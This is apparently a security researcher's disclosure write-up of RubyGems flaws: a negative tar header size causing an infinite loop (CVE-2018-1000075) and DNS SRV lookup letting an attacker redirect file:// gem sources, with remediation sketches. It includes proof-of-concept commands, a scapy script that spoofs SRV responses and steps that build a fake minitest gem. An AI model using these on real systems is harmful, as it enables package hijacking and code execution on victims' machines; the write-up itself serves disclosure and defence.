Be aware that if the original multi_json-1.12.2.gem and the new forged.gem are both in the same directory, then gem install ./forged.gem will—for some reason—install multi_json-1.12.2.gem instead. You have to hide the original file in another directory first.

Negative size in tar header causes infinite loop

This was a parsing bug: certain numeric fields in tar headers were allowed to be negative or to have other weird formats, and as a consequence some commands could be made to go into an infinite loop. This vulnerability was assigned CVE-2018-1000075. The commit 92e98bf8f8 that fixed this bug shipped in RubyGems 2.7.6.

Because Ruby doesn't have a tar package in the standard library, a lot of other Ruby software imports Gem::Package::TarReader in order to use RubyGems' tar-handling code (as recommended here, here, and here, for example). So in practice, the code is used on generic tar files, not just specially formatted gem files. Fixing the infinite-loop bug caused a problem for someone who was trying to parse a different flavor of tar files; presumably past versions of RubyGems silently returned garbage for certain fields in such formats, rather than signaling an error.

The minitar library was also vulnerable.


Proof of concept

The attached file loop.gem causes an infinite loop in any command that tries to iterate over the entries in the tar container.

gem install loop.gem
gem unpack loop.gem
gem specification loop.gem

Summary

Gem::Package::TarHeader.from uses oct to parse fields in the tar header. oct does more than just parse octal digits; for example, it also accepts a leading minus sign, which makes it possible to encode negative values.
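
As an illustration, here are a few inputs that Ruby's String#oct accepts. The particular inputs are chosen as examples of its leniency (sign, radix prefixes, underscores); only the negative size comes from the proof of concept.

```ruby
# String#oct parses leniently: it takes the longest valid leading
# substring and honors a sign, radix prefixes, and underscores.
p "1000".oct          # plain octal digits        => 512
p "-0000001000".oct   # leading minus sign        => -512
p "0x1f".oct          # hexadecimal radix prefix  => 31
p "0b101".oct         # binary radix prefix       => 5
p "1_0".oct           # underscore between digits => 8
```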

The ability to encode negative values enables a DoS (infinite loop) in the tar reader. The proof-of-concept loop.gem has a size field of -0000001000\x00, or −512. The negative size causes Gem::Package::TarReader.each to seek backwards after reading the header, so it reads the same header over and over.
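
The backwards seek can be modeled in a few lines of Ruby. This is a simplified model of a tar reading loop, not RubyGems' actual code: positions_visited is a hypothetical function, the archive is just zero bytes, and the size is passed in directly rather than parsed from a header. The iteration cap exists only so that the demonstration terminates.

```ruby
require "stringio"

BLOCK = 512

# Simplified model of a tar reader loop (not RubyGems' actual code):
# read one 512-byte header, then skip over the entry body by seeking
# `size` bytes relative to the current position.
def positions_visited(io, size, max_iterations)
  visited = []
  max_iterations.times do
    visited << io.pos
    header = io.read(BLOCK)
    break if header.nil? || header.bytesize < BLOCK
    io.seek(size, IO::SEEK_CUR) # a negative size moves backwards
  end
  visited
end

p positions_visited(StringIO.new("\0" * (4 * BLOCK)), 512, 5)
p positions_visited(StringIO.new("\0" * (4 * BLOCK)), -512, 5)
```

With a size of 512 the reader advances through the data and stops at the end; with a size of -512 every iteration starts again at offset 0, so without the cap it would never finish.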

I suppose one could cause a lot of CPU usage on the rubygems.org server by uploading copies of loop.gem, but I didn't try it.

Remediation

Instead of doing the conversion using oct, there could be a special-purpose function that validates its input better. It might be enough to check that the string matches /\A[0-7]+\z/ before calling oct.
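
A minimal sketch of such a function follows. parse_octal_field is a hypothetical name, and the sketch assumes that any trailing NUL or space padding has already been stripped from the field before it is checked.

```ruby
# Hypothetical helper: parse a tar header numeric field strictly.
# Assumes padding (NULs or spaces) has already been stripped.
def parse_octal_field(str)
  unless /\A[0-7]+\z/.match?(str)
    raise ArgumentError, "#{str.inspect} is not an octal string"
  end
  str.oct
end

p parse_octal_field("0000001000") # => 512
```

With this check in front, inputs such as "-0000001000", "0x1f", or "1_0" raise ArgumentError instead of being converted.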

The attached patch file adds a test that Gem::Package::TarHeader.from rejects various bogus syntax.

DNS SRV lookup of file:// sources enables local hijacking of gems

RubyGems's DNS SRV lookup feature was questionable from a security perspective, but we did not find an actual working exploit for http and https sources, nor for s3 sources. However, for file:// sources, I did find an exploit, though it only works under a narrow set of conditions.

SRV lookups were removed in October 2018, eliminating this whole class of potential vulnerabilities.

This report was awarded a $500 bounty.


Summary

gem makes a DNS SRV query for each of its configured sources; the response is allowed to override the source URL in certain ways. The SRV query happens not only for http:// and https:// sources, but also for s3:// and file://. In the case of file://, the SRV response may add a prefix to the local filesystem path from which gems are fetched. As a consequence, an attacker who can provide or spoof DNS responses, and can write to the local filesystem, may cause a victim to download fake gems with arbitrary contents.

Demonstration

Here is how an attacker may hijack a victim's installation of the minitest gem. The users attacker and victim share the same local filesystem. victim expects to install gems from /home/victim/trusted-gem-path, but attacker will force the installation to be from /tmp/attack/home/victim/trusted-gem-path instead.

First, victim sets up a file:// repo. This could also be done by some other party, like a local administrator.

victim$ mkdir -p /home/victim/trusted-gem-path/gems
victim$ (cd /home/victim/trusted-gem-path/gems && gem fetch --clear-sources --source https://rubygems.org/ minitest)
victim$ gem generate_index -d /home/victim/trusted-gem-path

Then attacker makes a malicious gem file and installs it under a prefix where attacker can write and victim can read. We'll use /tmp/attack.

# Make a malicious gem
attacker$ mkdir lib
attacker$ echo 'puts "hacked"' > lib/hacked.rb
attacker$ cat <<EOF > hacked.gemspec
Gem::Specification.new do |s|
  s.name = 'minitest'
  s.version = '5.11.3'
  s.files = ['lib/hacked.rb']
end
EOF
attacker$ gem build --force hacked.gemspec
# Make it available under /tmp/attack
attacker$ mkdir -p /tmp/attack/home/victim/trusted-gem-path/gems
attacker$ cp minitest-5.11.3.gem /tmp/attack/home/victim/trusted-gem-path/gems
attacker$ gem generate_index -d /tmp/attack/home/victim/trusted-gem-path

Next, attacker runs a program to spoof SRV responses. This will require root privileges if run on the same host, but it could also be done from another host in the same local network. The attacker may even control the local DNS, for example by being the wi-fi admin.

#!/usr/bin/env python3

from scapy.all import *

TARGET = b"xxx./tmp/attack"

def respond(pkt):
    if not (DNS in pkt and pkt[DNS].opcode == 0 and pkt[DNS].ancount == 0):
        return
    q = pkt[DNSQR]
    # Nothing after "_rubygems._tcp." indicates that the host is empty;
    # i.e., that it's likely a lookup for a file:// URL. 33 == SRV.
    if not (q.qname == b"_rubygems._tcp." and q.qtype == 33):
        return
    resp = IP(src=pkt[IP].dst, dst=pkt[IP].src) \
        / UDP(sport=pkt[UDP].dport, dport=pkt[UDP].sport) \
        / DNS(qr=1, id=pkt[DNS].id, qd=q, ancount=1) \
        / DNSRRSRV(type=33, rrname=q.qname, ttl=30, priority=0, weight=1, port=80, rdlen=8+len(TARGET), target=TARGET)
    send(resp)

sniff(filter="udp dst port 53", prn=respond)

Finally, victim tries to fetch a gem and specifically asks for their previously configured file:// source. attacker's SRV response adds a /tmp/attack prefix and victim ends up with a malicious gem.

victim$ gem fetch --clear-sources --source file:///home/victim/trusted-gem-path minitest
victim$ tar -O -xf minitest-5.11.3.gem -- data.tar.gz | tar tzf -
lib/hacked.rb

Analysis

The api_endpoint function takes a URL, extracts the host component, and then issues a SRV query for _rubygems._tcp.#{host}. Its usual purpose is to replace "rubygems.org" with "api.rubygems.org" in http:// and https:// URLs; but it is also called for s3:// and file:// URLs. In a typical file:// URL, the host component is empty, so the query will be for _rubygems._tcp..

api_endpoint has the property that it allows limited control of parts of the URL other than the host component: in particular you can add a prefix to the path component by including / characters in the SRV response. The attack works by sending a SRV response of xxx./tmp/attack. The xxx. can be anything, as long as it ends with a . in order to pass the subdomain check. Receiving such a response, api_endpoint transforms the input URL

file:///home/victim/trusted-gem-path

into the output URL

file://xxx./tmp/attack/home/victim/trusted-gem-path

In the output URL, the xxx. is technically the host component, but it doesn't matter because it is ignored.
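
The path-prefix effect can be reproduced with Ruby's URI library. This is only a sketch of the string composition described above, not the api_endpoint code itself: it assumes the new URL is formed by joining the scheme, the SRV target, and the original path, and it leaves out the DNS query and the subdomain check.

```ruby
require "uri"

source = URI.parse("file:///home/victim/trusted-gem-path")
srv_target = "xxx./tmp/attack" # attacker-controlled SRV response

# Assumed composition: scheme + SRV target + original path.
rewritten = URI.parse("#{source.scheme}://#{srv_target}#{source.path}")

p rewritten.host # => "xxx."
p rewritten.path # => "/tmp/attack/home/victim/trusted-gem-path"
```

Everything after the first / in the SRV target ends up at the front of the path, which is what redirects the fetch into the attacker's directory.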

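The conditions for exploitation seem fairly narrow: the victim must install gems from a file:// source, the attacker must be able to provide or spoof DNS responses to the victim, and the attacker must be able to write to a location on the filesystem that the victim can read.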

I don't know how common such conditions are. While gem supports file:// sources, I wasn't able to find much information on configuring them other than one bug report. It seems to be more common to share a repository over http than to use a shared filesystem. Commit 37d486cfd9 says "bundler gemspecs use file:// URIs for their sources," but I could not find in Bundler where that happens.

Remediation

The best solution seems to be not to call api_endpoint for file:// (and s3://) URLs. The host component of such URLs doesn't have the same meaning as it does in http:// and https:// URLs.

A mitigation that would be sufficient in this case is to validate SRV responses more strictly, not allowing them to modify any component other than the host (GitHub #2035, HackerOne #274267).
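
Stricter validation might look something like this sketch. acceptable_srv_target? and the HOSTNAME pattern are hypothetical, written for illustration; they are not the change that was actually made to RubyGems. The idea is to accept a target only if it consists of hostname characters and is a subdomain of the queried host, and to refuse rewriting entirely when there is no host.

```ruby
# Hypothetical validator, not the actual RubyGems fix: accept an SRV
# target only if it is a plain hostname under the queried host.
HOSTNAME = /\A[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*\.?\z/

def acceptable_srv_target?(target, host)
  return false if host.nil? || host.empty? # e.g. file:// URLs
  return false unless HOSTNAME.match?(target) # no "/" or other extras
  target.downcase.chomp(".").end_with?(".#{host.downcase}")
end

p acceptable_srv_target?("api.rubygems.org", "rubygems.org") # => true
p acceptable_srv_target?("xxx./tmp/attack", "")              # => false
```

Because / is not a hostname character, a target like xxx./tmp/attack is rejected even when the host is not empty.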

Impact

The CVSS calculator says the severity is "high" but I would put it at "low" because of the difficulty of execution. The impact is indeed bad: arbitrary code execution using the victim's privileges, whether through Ruby code or a C extension. But as far as I can tell, the conditions for exploitation are uncommon.